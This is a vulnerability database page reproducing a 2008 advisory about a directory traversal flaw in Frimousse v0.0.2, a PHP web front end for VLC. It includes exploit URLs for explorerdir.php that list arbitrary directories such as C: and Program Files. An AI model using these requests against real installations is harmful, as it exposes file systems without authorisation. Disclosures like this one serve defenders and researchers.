Lucene search

frimousse-traverse.txt

🗓️ 22 Jan 2008 00:00:00Reported by H-T TeamType

packetstorm🔗 packetstormsecurity.com👁 18 Views

Frimousse v.0.0.2, Freeplayer web interface, Vulnerability in directory traversals

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`software : Frimousse v.0.0.2  
vendor : http://frimousseweb.free.fr/  
  
[+] Introduction  
Frimousse is a freeplayer interface web written in php language , works with apache & php & VLC ( media player ) .  
it is used for manage the playlist and view it in interface web with VLC media player .  
Frimousse runs on Linux and Microsoft Windows.  
  
apache & php & VLC are integred in setup of version for windows and attched with php archive for linux :  
  
Frimousse 0.0.2 setup.exe > http://frimousseweb.free.fr/files/Frimousse_0.0.2_setup.exe  
Frimousse 0.0.2 minimal.rar > http://frimousseweb.free.fr/files/Frimousse_0.0.2_minimal_install.rar  
  
[+] vulnerability discovered by : Houssamix from H-T Team   
H-T Team = HouSSaMix + ToXiC350 + RxH  
  
[+] vulnerable version : Frimousse v.0.0.2   
  
{ BUG } : directory traversals :  
  
=> xpl > http://127.0.0.1:8080/explorerdir.php?name=[directory]  
=> ex > http://127.0.0.1:8080/explorerdir.php?name=C:  
http://127.0.0.1:8080/explorerdir.php?name=C:\Program Files  
  
------------------------------------------------------------------------------------------  
- H-T Team -- greetz : Cold-zero (hackteach.org) -Mahmood_ali (tryag.cc) - DDos & all hackers muslims --  
------------------------------------------------------------------------------------------  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

22 Jan 2008 00:00Current

7.4High risk

Vulners AI Score7.4